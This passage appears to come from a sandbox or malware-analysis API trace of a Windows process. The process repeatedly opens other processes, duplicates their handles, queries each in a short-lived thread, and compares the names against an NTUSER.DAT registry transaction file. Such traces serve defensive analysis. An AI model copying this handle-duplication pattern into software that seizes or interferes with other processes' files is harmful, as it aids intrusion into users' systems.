dwProcessId=0xb7c) returned 0x1e8 [0166.628] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.628] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.629] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.630] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.630] CloseHandle (hObject=0x1e4) returned 1 [0166.630] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0166.630] CloseHandle (hObject=0x194) returned 1 [0166.630] CloseHandle (hObject=0x1e8) returned 1 [0166.630] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0166.630] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.630] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.631] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.632] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.632] CloseHandle (hObject=0x1e4) returned 1 [0166.632] CloseHandle (hObject=0x194) returned 1 [0166.632] CloseHandle (hObject=0x1e8) returned 1 [0166.632] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0166.632] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x11c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.632] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.633] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.637] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.637] CloseHandle (hObject=0x1e4) returned 1 [0166.638] _wcsicmp (_Str1="\\RacMetaData.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 4 [0166.638] CloseHandle (hObject=0x194) returned 1 [0166.638] CloseHandle (hObject=0x1e8) returned 1 [0166.638] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0166.638] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x130, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.638] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.639] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.639] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.640] CloseHandle (hObject=0x1e4) returned 1 [0166.640] _wcsicmp (_Str1="\\RacDatabase.sdf", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 4 [0166.640] CloseHandle (hObject=0x194) returned 1 [0166.640] CloseHandle (hObject=0x1e8) returned 1 [0166.640] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0166.640] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x160, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.640] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.641] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.642] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.642] CloseHandle (hObject=0x1e4) returned 1 [0166.642] _wcsicmp (_Str1="\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0166.642] CloseHandle (hObject=0x194) returned 1 [0166.642] CloseHandle (hObject=0x1e8) returned 1 [0166.642] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0166.642] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.642] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.643] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.644] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.644] CloseHandle (hObject=0x1e4) returned 1 [0166.644] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -3 [0166.644] CloseHandle (hObject=0x194) returned 1 [0166.644] CloseHandle (hObject=0x1e8) returned 1 [0166.644] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0166.644] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.644] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.645] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.646] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.646] CloseHandle (hObject=0x1e4) returned 1 [0166.646] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0166.646] CloseHandle (hObject=0x194) returned 1 [0166.646] CloseHandle (hObject=0x1e8) returned 1 [0166.646] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0166.646] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.646] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.647] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.648] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.648] CloseHandle (hObject=0x1e4) returned 1 [0166.648] _wcsicmp (_Str1="\\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0166.648] CloseHandle (hObject=0x194) returned 1 [0166.648] CloseHandle (hObject=0x1e8) returned 1 [0166.649] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0166.649] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2e4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.649] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.649] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.650] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.650] CloseHandle (hObject=0x1e4) returned 1 [0166.650] _wcsicmp (_Str1="\\WinSATAPI.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.650] CloseHandle (hObject=0x194) returned 1 [0166.651] CloseHandle (hObject=0x1e8) returned 1 [0166.651] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0166.651] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x334, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.651] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.652] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.652] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.652] CloseHandle (hObject=0x1e4) returned 1 [0166.653] _wcsicmp (_Str1="\\RacWmiDatabase.sdf", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 4 [0166.653] CloseHandle (hObject=0x194) returned 1 [0166.653] CloseHandle (hObject=0x1e8) returned 1 [0166.653] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0166.653] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x34c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.653] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.654] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.654] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.655] CloseHandle (hObject=0x1e4) returned 1 [0166.655] _wcsicmp (_Str1="\\sql96F1.tmp", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0166.655] CloseHandle (hObject=0x194) returned 1 [0166.655] CloseHandle (hObject=0x1e8) returned 1 [0166.655] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xb7c) returned 0x1e8 [0166.655] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x370, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.655] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.656] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.656] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.657] CloseHandle (hObject=0x1e4) returned 1 [0166.657] _wcsicmp (_Str1="\\sql9702.tmp", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0166.657] CloseHandle (hObject=0x194) returned 1 [0166.657] CloseHandle (hObject=0x1e8) returned 1 [0166.657] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8b8) returned 0x1e8 [0166.657] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.657] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.658] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.659] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.659] CloseHandle (hObject=0x1e4) returned 1 [0166.659] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0166.659] CloseHandle (hObject=0x194) returned 1 [0166.659] CloseHandle (hObject=0x1e8) returned 1 [0166.659] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8b8) returned 0x1e8 [0166.659] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.659] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.660] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.662] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.662] CloseHandle (hObject=0x1e4) returned 1 [0166.662] CloseHandle (hObject=0x194) returned 1 [0166.662] CloseHandle (hObject=0x1e8) returned 1 [0166.662] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8b8) returned 0x1e8 [0166.662] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xf8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.662] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.663] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.664] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.664] CloseHandle (hObject=0x1e4) returned 1 [0166.664] _wcsicmp (_Str1="\\EQUATION", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -9 [0166.664] CloseHandle (hObject=0x194) returned 1 [0166.664] CloseHandle (hObject=0x1e8) returned 1 [0166.664] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x8b8) returned 0x1e8 [0166.664] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x12c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.664] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.665] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.666] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.666] CloseHandle (hObject=0x1e4) returned 1 [0166.666] _wcsicmp (_Str1="\\Fonts", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -8 [0166.666] CloseHandle (hObject=0x194) returned 1 [0166.666] CloseHandle (hObject=0x1e8) returned 1 [0166.666] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x938) returned 0x1e8 [0166.666] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.666] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.667] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.668] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.668] CloseHandle (hObject=0x1e4) returned 1 [0166.668] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0166.668] CloseHandle (hObject=0x194) returned 1 [0166.668] CloseHandle (hObject=0x1e8) returned 1 [0166.668] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x938) returned 0x1e8 [0166.668] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x74, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.668] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.669] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.670] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.670] CloseHandle (hObject=0x1e4) returned 1 [0166.670] CloseHandle (hObject=0x194) returned 1 [0166.670] CloseHandle (hObject=0x1e8) returned 1 [0166.670] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x938) returned 0x1e8 [0166.670] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x148, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.670] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.671] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.672] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.672] CloseHandle (hObject=0x1e4) returned 1 [0166.672] CloseHandle (hObject=0x194) returned 1 [0166.672] CloseHandle (hObject=0x1e8) returned 1 [0166.672] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x938) returned 0x1e8 [0166.672] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x198, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.673] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.673] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.674] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.674] CloseHandle (hObject=0x1e4) returned 1 [0166.674] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0166.674] CloseHandle (hObject=0x194) returned 1 [0166.675] CloseHandle (hObject=0x1e8) returned 1 [0166.675] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x938) returned 0x1e8 [0166.675] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1ac, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.675] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.675] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x102 [0166.928] TerminateThread (hThread=0x1e4, dwExitCode=0x0) returned 1 [0166.929] CloseHandle (hObject=0x1e4) returned 1 [0166.929] CloseHandle (hObject=0x194) returned 1 [0166.929] CloseHandle (hObject=0x1e8) returned 1 [0166.929] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x998) returned 0x1e8 [0166.929] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.929] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.930] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.931] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.931] CloseHandle (hObject=0x1e4) returned 1 [0166.931] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0166.931] CloseHandle (hObject=0x194) returned 1 [0166.931] CloseHandle (hObject=0x1e8) returned 1 [0166.931] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x998) returned 0x1e8 [0166.931] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x60, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.931] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.932] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.933] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.933] CloseHandle (hObject=0x1e4) returned 1 [0166.933] CloseHandle (hObject=0x194) returned 1 [0166.933] CloseHandle (hObject=0x1e8) returned 1 [0166.933] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x998) returned 0x1e8 [0166.933] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x154, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.933] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.934] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.935] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.935] CloseHandle (hObject=0x1e4) returned 1 [0166.935] _wcsicmp (_Str1="\\MPLog-07132009-221054.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0166.935] CloseHandle (hObject=0x194) returned 1 [0166.935] CloseHandle (hObject=0x1e8) returned 1 [0166.935] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x998) returned 0x1e8 [0166.935] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x270, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.935] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.936] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.937] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.937] CloseHandle (hObject=0x1e4) returned 1 [0166.937] CloseHandle (hObject=0x194) returned 1 [0166.937] CloseHandle (hObject=0x1e8) returned 1 [0166.937] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x998) returned 0x1e8 [0166.937] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x390, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.937] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.941] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 